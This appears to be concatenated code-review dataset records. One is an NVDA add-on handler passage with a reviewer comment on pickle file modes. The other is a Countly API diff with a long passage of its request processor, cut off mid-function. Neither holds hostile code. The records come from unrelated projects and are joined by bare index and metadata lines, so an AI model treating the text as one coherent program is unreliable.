state['pendingDisableSet'].discard(self.name) saveState() def completeRemove(self,runUninstallTask=True): if runUninstallTask: try: # #2715: The add-on must be added to _availableAddons here so that # translations can be used in installTasks module. _availableAddons[self.path] = self self.runInstallTask("onUninstall") except: log.error("task 'onUninstall' on addon '%s' failed"%self.name,exc_info=True) finally: del _availableAddons[self.path] tempPath=tempfile.mktemp(suffix=DELETEDIR_SUFFIX,dir=os.path.dirname(self.path)) try: os.rename(self.path,tempPath) except (WindowsError,IOError): raise RuntimeError("Cannot rename add-on path for deletion") shutil.rmtree(tempPath,ignore_errors=True) if os.path.exists(tempPath): log.error("Error removing addon directory %s, deferring until next NVDA restart"%self.path) # clean up the addons state. If an addon with the same name is installed, it should not be automatically # disabled / blocked. log.debug("removing addon {} from _disabledAddons/_blockedAddons".format(self.name)) _disabledAddons.discard(self.name) _blockedAddons.discard(self.name) saveState() def addToPackagePath(self, package): """ Adds this L{Addon} extensions to the specific package path if those exist. This allows the addon to "run" / be available because the package is able to search its path, looking for particular modules. This is used by the following: - `globalPlugins` - `appModules` - `synthDrivers` - `brailleDisplayDrivers` @param package: the python module representing the package. @type package: python module. """ # #3090: Ensure that we don't add disabled / blocked add-ons to package path. # By returning here the addon does not "run"/ become active / registered. if self.isDisabled or self.isBlocked: return extension_path = os.path.join(self.path, package.__name__) if not os.path.isdir(extension_path): # This addon does not have extension points for this package return # Python 2.x doesn't properly handle unicode import paths, so convert them before adding. 
converted_path = self._getPathForInclusionInPackage(package) package.__path__.insert(0, converted_path) self._extendedPackages.add(package) log.debug("Addon %s added to %s package path", self.manifest['name'], package.__name__) def enable(self, shouldEnable): """Sets this add-on to be disabled or enabled when NVDA restarts.""" if shouldEnable: if not isAddonCompatible(self): import addonAPIVersion raise AddonError( "Add-on is not compatible:" " minimum NVDA version {}, last tested version {}," " NVDA current {}, NVDA backwards compatible to {}".format( self.manifest['minimumNVDAVersion'], self.manifest['lastTestedNVDAVersion'], addonAPIVersion.CURRENT, addonAPIVersion.BACK_COMPAT_TO ) ) if self.name in state["pendingDisableSet"]: # Undoing a pending disable. state["pendingDisableSet"].discard(self.name) else: state["pendingEnableSet"].add(self.name) else: if self.name in state["pendingEnableSet"]: # Undoing a pending enable. state["pendingEnableSet"].discard(self.name) # No need to disable an addon that is already disabled. # This also prevents the status in the add-ons dialog from saying "disabled, pending disable" elif self.name not in state["disabledAddons"]: state["pendingDisableSet"].add(self.name) # Record enable/disable flags as a way of preparing for disaster such as sudden NVDA crash. saveState() @property def isRunning(self): return not (globalVars.appArgs.disableAddons or self.isPendingInstall or self.isDisabled or self.isBlocked) @property def isDisabled(self): return self.name in _disabledAddons @property def isBlocked(self): return self.name in _blockedAddons @property def isPendingEnable(self): return self.name in state["pendingEnableSet"] @property def isPendingDisable(self): return self.name in state["pendingDisableSet"] def _getPathForInclusionInPackage(self, package): extension_path = os.path.join(self.path, package.__name__) return extension_path.encode("mbcs") def loadModule(self, name): """ loads a python module from the addon directory @param name: the module name @type name: string @returns the python module with C[name} @rtype python module """ log.debug("Importing module %s from plugin %s", name, self.name) importer = pkgutil.ImpImporter(self.path) loader = importer.find_module(name) if not loader: return None # Create a qualified full name to avoid modules with the same name on sys.modules. fullname = "addons.%s.%s" % (self.name, name) try: return loader.load_module(fullname) except ImportError: # in this case return None, any other error throw to be handled elsewhere return None def getTranslationsInstance(self, domain='nvda'): """ Gets the gettext translation instance for this addon. <addon-path<\locale will be used to find .mo files, if exists. If a translation file is not found the default fallback null translation is returned. @param domain: the tranlation domain to retrieve. The 'nvda' default should be used in most cases. @returns: the gettext translation class. """ localedir = os.path.join(self.path, "locale") return gettext.translation(domain, localedir=localedir, languages=[languageHandler.getLanguage()], fallback=True) def runInstallTask(self,taskName,*args,**kwargs): """ Executes the function having the given taskName with the given args and kwargs in the addon's installTasks module if it exists. 
""" if not hasattr(self,'_installTasksModule'): self._installTasksModule=self.loadModule('installTasks') if self._installTasksModule: func=getattr(self._installTasksModule,taskName,None) if func: func(*args,**kwargs) def getDocFilePath(self, fileName=None): """Get the path to a documentation file for this add-on. The file should be located in C{doc\lang\file} inside the add-on, where C{lang} is the language code and C{file} is the requested file name. Failing that, the language without country is tried. English is tried as a last resort. An add-on can specify a default documentation file name via the docFileName parameter in its manifest. @param fileName: The requested file name or C{None} for the add-on's default. @type fileName: basestring @return: The path to the requested file or C{None} if it wasn't found. @rtype: basestring """ if not fileName: fileName = self.manifest["docFileName"] if not fileName: return None docRoot = os.path.join(self.path, "doc") lang = languageHandler.getLanguage() langs = [lang] if "_" in lang: lang = lang.split("_", 1)[0] langs.append(lang) if lang != "en": langs.append("en") for lang in langs: docFile = os.path.join(docRoot, lang, fileName) if os.path.isfile(docFile): return docFile return None def getCodeAddon(obj=None, frameDist=1): """ Returns the L{Addon} where C{obj} is defined. If obj is None the caller code frame is assumed to allow simple retrieval of "current calling addon". @param obj: python object or None for default behaviour. @param frameDist: howmany frames is the caller code. Only change this for functions in this module. @return: L{Addon} instance or None if no code does not belong to a add-on package. @rtype: C{Addon} """ global _availableAddons if obj is None: obj = sys._getframe(frameDist) fileName = inspect.getfile(obj) dir= unicode(os.path.abspath(os.path.dirname(fileName)), "mbcs") # if fileName is not a subdir of one of the addon paths # It does not belong to an addon. for p in _getDefaultAddonPaths(): if dir.startswith(p): break else: raise AddonError("Code does not belong to an addon package.") curdir = dir while curdir not in _getDefaultAddonPaths(): if curdir in _availableAddons.keys(): return _availableAddons[curdir] curdir = os.path.abspath(os.path.join(curdir, "..")) # Not found! raise AddonError("Code does not belong to an addon") def initTranslation(): addon = getCodeAddon(frameDist=2) translations = addon.getTranslationsInstance() # Point _ to the translation object in the globals namespace of the caller frame # FIXME: shall we retrieve the caller module object explicitly? try: callerFrame = inspect.currentframe().f_back callerFrame.f_globals['_'] = translations.ugettext # Install our pgettext function. callerFrame.f_globals['pgettext'] = languageHandler.makePgettext(translations) finally: del callerFrame # Avoid reference problems with frames (per python docs) def _translatedManifestPaths(lang=None, forBundle=False): if lang is None: lang = languageHandler.getLanguage() # can't rely on default keyword arguments here. langs=[lang] if '_' in lang: langs.append(lang.split('_')[0]) if lang!='en' and not lang.startswith('en_'): langs.append('en') sep = "/" if forBundle else os.path.sep return [sep.join(("locale", lang, MANIFEST_FILENAME)) for lang in langs] class AddonBundle(AddonBase): """ Represents the contents of an NVDA addon suitable for distribution. The bundle is compressed using the zip file format. 
Manifest information is available without the need for extraction.""" def __init__(self, bundlePath): """ Constructs an L{AddonBundle} from a filename. @param bundlePath: The path for the bundle file. """ self._path = bundlePath if isinstance(bundlePath, unicode) else unicode(bundlePath, "mbcs") # Read manifest: translatedInput=None with zipfile.ZipFile(self._path, 'r') as z: for translationPath in _translatedManifestPaths(forBundle=True): try: translatedInput = z.open(translationPath, 'r') break except KeyError: pass self._manifest = AddonManifest(z.open(MANIFEST_FILENAME), translatedInput=translatedInput) if self.manifest.errors is not None: _report_manifest_errors(self.manifest) raise AddonError("Manifest file has errors.") def extract(self, addonPath): """ Extracts the bundle content to the specified path. The addon will be extracted to L{addonPath} @param addonPath: Path where to extract contents. @type addonPath: string """ with zipfile.ZipFile(self._path, 'r') as z: for info in z.infolist(): if isinstance(info.filename, str): # #2505: Handle non-Unicode file names. # Most archivers seem to use the local OEM code page, even though the spec says only cp437. # HACK: Overriding info.filename is a bit ugly, but it avoids a lot of code duplication. info.filename = info.filename.decode("cp%d" % winKernel.kernel32.GetOEMCP()) z.extract(info, addonPath) @property def manifest(self): """ Gets the manifest for the represented Addon. @rtype: AddonManifest """ return self._manifest def __repr__(self): return "<AddonBundle at %s>" % self._path def createAddonBundleFromPath(path, destDir=None): """ Creates a bundle from a directory that contains a a addon manifest file.""" basedir = os.path.abspath(path) # If caller did not provide a destination directory name # Put the bundle at the same level of the addon's top directory, # That is, basedir/.. if destDir is None: destDir = os.path.dirname(basedir) manifest_path = os.path.join(basedir, MANIFEST_FILENAME) if not os.path.isfile(manifest_path): raise AddonError("Can't find %s manifest file." % manifest_path) with open(manifest_path) as f: manifest = AddonManifest(f) if manifest.errors is not None: _report_manifest_errors(manifest) raise AddonError("Manifest file has errors.") bundleFilename = "%s-%s.%s" % (manifest['name'], manifest['version'], BUNDLE_EXTENSION) bundleDestination = os.path.join(destDir, bundleFilename) with zipfile.ZipFile(bundleDestination, 'w') as z: # FIXME: the include/exclude feature may or may not be useful. Also python files can be pre-compiled. for dir, dirnames, filenames in os.walk(basedir): relativePath = os.path.relpath(dir, basedir) for filename in filenames: pathInBundle = os.path.join(relativePath, filename) absPath = os.path.join(dir, filename) z.write(absPath, pathInBundle) return AddonBundle(bundleDestination) def _report_manifest_errors(manifest): log.warning("Error loading manifest:\n%s", manifest.errors) class AddonManifest(ConfigObj): """ Add-on manifest file. It contains metadata about an NVDA add-on package. """ configspec = ConfigObj(StringIO( """ # NVDA Add-on Manifest configuration specification # Add-on unique name name = string() # short summary (label) of the add-on to show to users. summary = string() # Long description with further information and instructions description = string(default=None) # Name of the author or entity that created the add-on author = string() # Version of the add-on. 
Should preferably in some standard format such as x.y.z version = string() # The minimum required NVDA version for this add-on to work correctly. # Should be less than or equal to lastTestedNVDAVersion minimumNVDAVersion = apiVersion(default="0.0.0") # Must be greater than or equal to minimumNVDAVersion lastTestedNVDAVersion = apiVersion(default="0.0.0") # URL for more information about the add-on. New versions and such. url= string(default=None) # Name of default documentation file for the add-on. docFileName = string(default=None) # NOTE: apiVersion: # Eg: 2019.1.0 or 0.0.0 # Must have 3 integers separated by dots. # The first integer must be a Year (4 characters) # "0.0.0" is also valid. # The final integer can be left out, and in that case will default to 0. E.g. 2019.1 """)) def __init__(self, input, translatedInput=None): """ Constructs an L{AddonManifest} instance from manifest string data @param input: data to read the manifest informatinon @type input: a fie-like object. @param translatedInput: translated manifest input @type translatedInput: file-like object """ super(AddonManifest, self).__init__(input, configspec=self.configspec, encoding='utf-8', default_encoding='utf-8') self._errors = None val = Validator({"apiVersion":validate_apiVersionString}) result = self.validate(val, copy=True, preserve_errors=True) if result != True: self._errors = result elif True != self._validateApiVersionRange(): self._errors = "Constraint not met: minimumNVDAVersion ({}) <= lastTestedNVDAVersion ({})".format( self.get("minimumNVDAVersion"), self.get("lastTestedNVDAVersion") ) self._translatedConfig = None if translatedInput is not None: self._translatedConfig = ConfigObj(translatedInput, encoding='utf-8', default_encoding='utf-8') for k in ('summary','description'): val=self._translatedConfig.get(k) if val: self[k]=val @property def errors(self): return self._errors def _validateApiVersionRange(self): lastTested = self.get("lastTestedNVDAVersion") minRequiredVersion = self.get("minimumNVDAVersion") return minRequiredVersion <= lastTested def validate_apiVersionString(value): from configobj.validate import ValidateError if not isinstance(value, string_types): raise ValidateError('Expected an apiVersion in the form of a string. EG "2019.1.0"') try: tuple = addonAPIVersion.getAPIVersionTupleFromString(value) return tuple except ValueError as e: raise ValidateError('"{}" is not a valid API Version string: {}'.format(value, e))
1
25,483
In Python 3, when pickling or unpickling objects, the file needs to be opened in binary mode so that no text encoding/decoding takes place. So for any open calls around pickle loads or dumps, the mode for reading must be "rb" and the mode for writing must be "wb".
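A minimal sketch of the binary-mode fix the reviewer describes, applied to the load and save paths used in addonHandler (names taken from the excerpt above):

import os.path
from six.moves import cPickle
import globalVars

stateFilename = "addonsState.pickle"
statePath = os.path.join(globalVars.appArgs.configPath, stateFilename)

# Reading: open in binary mode so cPickle receives raw bytes, no text decoding.
with open(statePath, "rb") as f:
    state = cPickle.load(f)

# Writing: binary mode as well.
with open(statePath, "wb") as f:
    cPickle.dump(state, f)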
nvaccess-nvda
py
@@ -2068,7 +2068,7 @@ const processRequest = (params) => { } else { if (params.qstring.event && params.qstring.event.startsWith('[CLY]_group_')) { - validateRead(params, 'core', countlyApi.data.fetch.fetchMergedEventGroups, params.qstring.method); + validateRead(params, 'core', countlyApi.data.fetch.fetchMergedEventGroups); } else { params.truncateEventValuesList = true;
1
/** * Module for processing data passed to Countly * @module api/utils/requestProcessor */ const Promise = require('bluebird'); const url = require('url'); const common = require('./common.js'); const countlyCommon = require('../lib/countly.common.js'); const { validateUser, validateRead, validateUserForRead, validateUserForWrite, validateGlobalAdmin, dbUserHasAccessToCollection, validateUpdate, validateDelete, validateCreate } = require('./rights.js'); const authorize = require('./authorizer.js'); const taskmanager = require('./taskmanager.js'); const plugins = require('../../plugins/pluginManager.js'); const versionInfo = require('../../frontend/express/version.info'); const packageJson = require('./../../package.json'); const log = require('./log.js')('core:api'); const fs = require('fs'); var countlyFs = require('./countlyFs.js'); var path = require('path'); const validateUserForWriteAPI = validateUser; const validateUserForDataReadAPI = validateRead; const validateUserForDataWriteAPI = validateUserForWrite; const validateUserForGlobalAdmin = validateGlobalAdmin; const validateUserForMgmtReadAPI = validateUser; var loaded_configs_time = 0; const countlyApi = { data: { usage: require('../parts/data/usage.js'), fetch: require('../parts/data/fetch.js'), events: require('../parts/data/events.js'), exports: require('../parts/data/exports.js'), geoData: require('../parts/data/geoData.js') }, mgmt: { users: require('../parts/mgmt/users.js'), apps: require('../parts/mgmt/apps.js'), appUsers: require('../parts/mgmt/app_users.js'), eventGroups: require('../parts/mgmt/event_groups.js') } }; const reloadConfig = function() { return new Promise(function(resolve) { var my_time = Date.now(); var reload_configs_after = common.config.reloadConfigAfter || 10000; //once in minute if (loaded_configs_time === 0 || (my_time - loaded_configs_time) >= reload_configs_after) { plugins.loadConfigs(common.db, () => { loaded_configs_time = my_time; resolve(); }, true); } else { resolve(); } }); }; /** * Default request processing handler, which requires request context to operate. Check tcp_example.js * @static * @param {params} params - for request context. Minimum needed properties listed * @param {object} params.req - Request object, should not be empty and should contain listed params * @param {string} params.req.url - Endpoint URL that you are calling. May contain query string. * @param {object} params.req.body - Parsed JSON object with data (same name params will overwrite query string if anything provided there) * @param {APICallback} params.APICallback - API output handler. 
Which should handle API response * @returns {void} void * @example * //creating request context * var params = { * //providing data in request object * 'req':{"url":"/i", "body":{"device_id":"test","app_key":"APP_KEY","begin_session":1,"metrics":{}}}, * //adding custom processing for API responses * 'APICallback': function(err, data, headers, returnCode, params){ * //handling api response, like sending to client or verifying * if(err){ * //there was problem processing request * console.log(data, returnCode); * } * else{ * //request was processed, let's handle response data * handle(data); * } * } * }; * * //processing request * processRequest(params); */ const processRequest = (params) => { if (!params.req || !params.req.url) { return common.returnMessage(params, 400, "Please provide request data"); } const urlParts = url.parse(params.req.url, true), queryString = urlParts.query, paths = urlParts.pathname.split("/"); /** * Main request processing object containing all information shared through all the parts of the same request * @typedef params * @type {object} * @global * @property {string} href - full URL href * @property {res} res - nodejs response object * @property {req} req - nodejs request object * @param {APICallback} params.APICallback - API output handler. Which should handle API response * @property {object} qstring - all the passed fields either through query string in GET requests or body and query string for POST requests * @property {string} apiPath - two top level url path, for example /i/analytics * @property {string} fullPath - full url path, for example /i/analytics/dashboards * @property {object} files - object with uploaded files, available in POST requests which upload files * @property {string} cancelRequest - Used for skipping SDK requests, if contains true, then request should be ignored and not processed. Can be set at any time by any plugin, but API only checks for it in beggining after / and /sdk events, so that is when plugins should set it if needed. Should contain reason for request cancelation * @property {boolean} bulk - True if this SDK request is processed from the bulk method * @property {array} promises - Array of the promises by different events. 
When all promises are fulfilled, request counts as processed * @property {string} ip_address - IP address of the device submitted request, exists in all SDK requests * @property {object} user - Data with some user info, like country geolocation, etc from the request, exists in all SDK requests * @property {object} app_user - Document from the app_users collection for current user, exists in all SDK requests after validation * @property {object} app_user_id - ID of app_users document for the user, exists in all SDK requests after validation * @property {object} app - Document for the app sending request, exists in all SDK requests after validation and after validateUserForDataReadAPI validation * @property {ObjectID} app_id - ObjectID of the app document, available after validation * @property {string} app_cc - Selected app country, available after validation * @property {string} appTimezone - Selected app timezone, available after validation * @property {object} member - All data about dashboard user sending the request, exists on all requests containing api_key, after validation through validation methods * @property {timeObject} time - Time object for the request */ params.href = urlParts.href; params.qstring = params.qstring || {}; params.res = params.res || {}; params.urlParts = urlParts; params.paths = paths; //request object fillers params.req.method = params.req.method || "custom"; params.req.headers = params.req.headers || {}; params.req.socket = params.req.socket || {}; params.req.connection = params.req.connection || {}; //copying query string data as qstring param if (queryString) { for (let i in queryString) { params.qstring[i] = queryString[i]; } } //copying body as qstring param if (params.req.body && typeof params.req.body === "object") { for (let i in params.req.body) { params.qstring[i] = params.req.body[i]; } } if (params.qstring.app_id && params.qstring.app_id.length !== 24) { common.returnMessage(params, 400, 'Invalid parameter "app_id"'); return false; } if (params.qstring.user_id && params.qstring.user_id.length !== 24) { common.returnMessage(params, 400, 'Invalid parameter "user_id"'); return false; } //remove countly path if (common.config.path === "/" + paths[1]) { paths.splice(1, 1); } let apiPath = ''; for (let i = 1; i < paths.length; i++) { if (i > 2) { break; } apiPath += "/" + paths[i]; } params.apiPath = apiPath; params.fullPath = paths.join("/"); reloadConfig().then(function() { plugins.dispatch("/", { params: params, apiPath: apiPath, validateAppForWriteAPI: validateAppForWriteAPI, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin, paths: paths, urlParts: urlParts }); if (!params.cancelRequest) { switch (apiPath) { case '/i/bulk': { let requests = params.qstring.requests; if (requests && typeof requests === "string") { try { requests = JSON.parse(requests); } catch (SyntaxError) { console.log('Parse bulk JSON failed', requests, params.req.url, params.req.body); requests = null; } } if (!requests) { common.returnMessage(params, 400, 'Missing parameter "requests"'); return false; } if (!Array.isArray(requests)) { console.log("Passed invalid param for request. 
Expected Array, got " + typeof requests); common.returnMessage(params, 400, 'Invalid parameter "requests"'); return false; } if (!plugins.getConfig("api", params.app && params.app.plugins, true).safe && !params.res.finished) { common.returnMessage(params, 200, 'Success'); } common.blockResponses(params); processBulkRequest(0, requests, params); break; } case '/i/users': { if (params.qstring.args) { try { params.qstring.args = JSON.parse(params.qstring.args); } catch (SyntaxError) { console.log('Parse ' + apiPath + ' JSON failed', params.req.url, params.req.body); } } switch (paths[3]) { case 'create': validateCreate(params, 'global_users', countlyApi.mgmt.users.createUser); break; case 'update': validateUpdate(params, 'global_users', countlyApi.mgmt.users.updateUser); break; case 'delete': validateDelete(params, 'global_users', countlyApi.mgmt.users.deleteUser); break; case 'deleteOwnAccount': validateDelete(params, 'global_users', countlyApi.mgmt.users.deleteOwnAccount); break; case 'ack': validateUserForWriteAPI(countlyApi.mgmt.users.ackNotification, params); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /create, /update, /deleteOwnAccount or /delete'); } break; } break; } case '/i/notes': { if (params.qstring.args) { try { params.qstring.args = JSON.parse(params.qstring.args); } catch (SyntaxError) { console.log('Parse ' + apiPath + ' JSON failed', params.req.url, params.req.body); } } switch (paths[3]) { case 'save': validateCreate(params, 'core', () => { countlyApi.mgmt.users.saveNote(params); }); break; case 'delete': validateDelete(params, 'core', () => { countlyApi.mgmt.users.deleteNote(params); }); break; } break; } case '/i/app_users': { switch (paths[3]) { case 'create': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } if (!params.qstring.data) { common.returnMessage(params, 400, 'Missing parameter "data"'); return false; } else if (typeof params.qstring.data === "string") { try { params.qstring.data = JSON.parse(params.qstring.data); } catch (ex) { console.log("Could not parse data", params.qstring.data); common.returnMessage(params, 400, 'Could not parse parameter "data": ' + params.qstring.data); return false; } } if (!Object.keys(params.qstring.data).length) { common.returnMessage(params, 400, 'Parameter "data" cannot be empty'); return false; } validateUserForWrite(params, function() { countlyApi.mgmt.appUsers.create(params.qstring.app_id, params.qstring.data, params, function(err, res) { if (err) { common.returnMessage(params, 400, err); } else { common.returnMessage(params, 200, 'User Created: ' + JSON.stringify(res)); } }); }); break; } case 'update': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } if (!params.qstring.update) { common.returnMessage(params, 400, 'Missing parameter "update"'); return false; } else if (typeof params.qstring.update === "string") { try { params.qstring.update = JSON.parse(params.qstring.update); } catch (ex) { console.log("Could not parse update", params.qstring.update); common.returnMessage(params, 400, 'Could not parse parameter "update": ' + params.qstring.update); return false; } } if 
(!Object.keys(params.qstring.update).length) { common.returnMessage(params, 400, 'Parameter "update" cannot be empty'); return false; } if (!params.qstring.query) { common.returnMessage(params, 400, 'Missing parameter "query"'); return false; } else if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query); } catch (ex) { console.log("Could not parse query", params.qstring.query); common.returnMessage(params, 400, 'Could not parse parameter "query": ' + params.qstring.query); return false; } } validateUserForWrite(params, function() { countlyApi.mgmt.appUsers.count(params.qstring.app_id, params.qstring.query, function(err, count) { if (err || count === 0) { common.returnMessage(params, 400, 'No users matching criteria'); return false; } if (count > 1 && !params.qstring.force) { common.returnMessage(params, 400, 'This query would update more than one user'); return false; } countlyApi.mgmt.appUsers.update(params.qstring.app_id, params.qstring.query, params.qstring.update, params, function(err2) { if (err2) { common.returnMessage(params, 400, err2); } else { common.returnMessage(params, 200, 'User Updated'); } }); }); }); break; } case 'delete': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } if (!params.qstring.query) { common.returnMessage(params, 400, 'Missing parameter "query"'); return false; } else if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query); } catch (ex) { console.log("Could not parse query", params.qstring.query); common.returnMessage(params, 400, 'Could not parse parameter "query": ' + params.qstring.query); return false; } } if (!Object.keys(params.qstring.query).length) { common.returnMessage(params, 400, 'Parameter "query" cannot be empty, it would delete all users. 
Use clear app instead'); return false; } validateUserForWrite(params, function() { countlyApi.mgmt.appUsers.count(params.qstring.app_id, params.qstring.query, function(err, count) { if (err || count === 0) { common.returnMessage(params, 400, 'No users matching criteria'); return false; } if (count > 1 && !params.qstring.force) { common.returnMessage(params, 400, 'This query would delete more than one user'); return false; } countlyApi.mgmt.appUsers.delete(params.qstring.app_id, params.qstring.query, params, function(err2) { if (err2) { common.returnMessage(params, 400, err); } else { common.returnMessage(params, 200, 'User deleted'); } }); }); }); break; } case 'deleteExport': { validateUserForWrite(params, function() { countlyApi.mgmt.appUsers.deleteExport(paths[4], params, function(err) { if (err) { common.returnMessage(params, 400, err); } else { common.returnMessage(params, 200, 'Export deleted'); } }); }); break; } case 'export': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } validateUserForWrite(params, function() { taskmanager.checkIfRunning({ db: common.db, params: params //allow generate request from params, as it is what identifies task in drill }, function(task_id) { //check if task already running if (task_id) { common.returnOutput(params, {task_id: task_id}); } else { if (!params.qstring.query) { common.returnMessage(params, 400, 'Missing parameter "query"'); return false; } else if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query); } catch (ex) { console.log("Could not parse query", params.qstring.query); common.returnMessage(params, 400, 'Could not parse parameter "query": ' + params.qstring.query); return false; } } var my_name = ""; if (params.qstring.query) { my_name = JSON.stringify(params.qstring.query); } countlyApi.mgmt.appUsers.export(params.qstring.app_id, params.qstring.query || {}, params, taskmanager.longtask({ db: common.db, threshold: plugins.getConfig("api").request_threshold, force: false, app_id: params.qstring.app_id, params: params, type: "AppUserExport", report_name: "User export", meta: JSON.stringify({ "app_id": params.qstring.app_id, "query": params.qstring.query || {} }), name: my_name, view: "#/exportedData/AppUserExport/", processData: function(err, res, callback) { if (!err) { callback(null, res); } else { callback(err, ''); } }, outputData: function(err, data) { if (err) { common.returnMessage(params, 400, err); } else { common.returnMessage(params, 200, data); } } })); } }); }); break; } default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /all or /me'); } break; } break; } case '/i/apps': { if (params.qstring.args) { try { params.qstring.args = JSON.parse(params.qstring.args); } catch (SyntaxError) { console.log('Parse ' + apiPath + ' JSON failed', params.req.url, params.req.body); } } switch (paths[3]) { case 'create': validateCreate(params, 'global_applications', countlyApi.mgmt.apps.createApp); break; case 'update': if (paths[4] === 'plugins') { validateUpdate(params, 'global_applications', countlyApi.mgmt.apps.updateAppPlugins); } else { validateUpdate(params, 'global_applications', 
countlyApi.mgmt.apps.updateApp); } break; case 'delete': validateDelete(params, 'global_applications', countlyApi.mgmt.apps.deleteApp); break; case 'reset': validateDelete(params, 'global_applications', countlyApi.mgmt.apps.resetApp); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /create, /update, /delete or /reset'); } break; } break; } case '/i/event_groups': switch (paths[3]) { case 'create': validateCreate(params, 'core', countlyApi.mgmt.eventGroups.create); break; case 'update': validateUpdate(params, 'core', countlyApi.mgmt.eventGroups.update); break; case 'delete': validateDelete(params, 'core', countlyApi.mgmt.eventGroups.remove); break; default: break; } break; case '/i/tasks': { if (!params.qstring.task_id) { common.returnMessage(params, 400, 'Missing parameter "task_id"'); return false; } switch (paths[3]) { case 'update': validateUserForWrite(params, () => { taskmanager.rerunTask({ db: common.db, id: params.qstring.task_id }, (err, res) => { common.returnMessage(params, 200, res); }); }); break; case 'delete': validateUserForWrite(params, () => { taskmanager.deleteResult({ db: common.db, id: params.qstring.task_id }, () => { common.returnMessage(params, 200, "Success"); }); }); break; case 'name': validateUserForWrite(params, () => { taskmanager.nameResult({ db: common.db, id: params.qstring.task_id, name: params.qstring.name }, () => { common.returnMessage(params, 200, "Success"); }); }); break; case 'edit': validateUserForWrite(params, () => { const data = { "report_name": params.qstring.report_name, "report_desc": params.qstring.report_desc, "global": params.qstring.global + "" === 'true', "autoRefresh": params.qstring.autoRefresh + "" === 'true', "period_desc": params.qstring.period_desc }; taskmanager.editTask({ db: common.db, data: data, id: params.qstring.task_id }, (err) => { if (err) { common.returnMessage(params, 503, "Error"); } else { common.returnMessage(params, 200, "Success"); } }); }); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path'); } break; } break; } case '/i/events': { switch (paths[3]) { case 'whitelist_segments': { validateUpdate(params, "events", function() { common.db.collection('events').findOne({"_id": common.db.ObjectID(params.qstring.app_id)}, function(err, event) { if (err) { common.returnMessage(params, 400, err); return; } else if (!event) { common.returnMessage(params, 400, "Could not find record in event collection"); return; } //rewrite whitelisted if (params.qstring.whitelisted_segments && params.qstring.whitelisted_segments !== "") { try { params.qstring.whitelisted_segments = JSON.parse(params.qstring.whitelisted_segments); } catch (SyntaxError) { params.qstring.whitelisted_segments = {}; console.log('Parse ' + params.qstring.whitelisted_segments + ' JSON failed', params.req.url, params.req.body); } var update = {}; var whObj = params.qstring.whitelisted_segments; for (let k in whObj) { if (Array.isArray(whObj[k]) 
&& whObj[k].length > 0) { update.$set = update.$set || {}; update.$set["whitelisted_segments." + k] = whObj[k]; } else { update.$unset = update.$unset || {}; update.$unset["whitelisted_segments." + k] = true; } } common.db.collection('events').update({"_id": common.db.ObjectID(params.qstring.app_id)}, update, function(err2) { if (err2) { common.returnMessage(params, 400, err2); } else { var data_arr = {update: {}}; if (update.$set) { data_arr.update.$set = update.$set; } if (update.$unset) { data_arr.update.$unset = update.$unset; } data_arr.update = JSON.stringify(data_arr.update); common.returnMessage(params, 200, 'Success'); plugins.dispatch("/systemlogs", { params: params, action: "segments_whitelisted_for_events", data: data_arr }); } }); } else { common.returnMessage(params, 400, "Value for 'whitelisted_segments' missing"); return; } }); }); break; } case 'edit_map': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } validateUpdate(params, 'events', function() { common.db.collection('events').findOne({"_id": common.db.ObjectID(params.qstring.app_id)}, function(err, event) { if (err) { common.returnMessage(params, 400, err); return; } else if (!event) { common.returnMessage(params, 400, "Could not find event"); return; } var update_array = {}; var update_segments = []; var pull_us = {}; if (params.qstring.event_order && params.qstring.event_order !== "") { try { update_array.order = JSON.parse(params.qstring.event_order); } catch (SyntaxError) { update_array.order = event.order; console.log('Parse ' + params.qstring.event_order + ' JSON failed', params.req.url, params.req.body); } } else { update_array.order = event.order || []; } if (params.qstring.event_overview && params.qstring.event_overview !== "") { try { update_array.overview = JSON.parse(params.qstring.event_overview); } catch (SyntaxError) { update_array.overview = []; console.log('Parse ' + params.qstring.event_overview + ' JSON failed', params.req.url, params.req.body); } if (update_array.overview && Array.isArray(update_array.overview) && update_array.overview.length > 12) { common.returnMessage(params, 400, "You can't add more than 12 items in overview"); return; } //check for duplicates var overview_map = {}; for (let p = 0; p < update_array.overview.length; p++) { if (!overview_map[update_array.overview[p].eventKey]) { overview_map[update_array.overview[p].eventKey] = {}; } if (!overview_map[update_array.overview[p].eventKey][update_array.overview[p].eventProperty]) { overview_map[update_array.overview[p].eventKey][update_array.overview[p].eventProperty] = 1; } else { update_array.overview.splice(p, 1); p = p - 1; } } } else { update_array.overview = event.overview || []; } 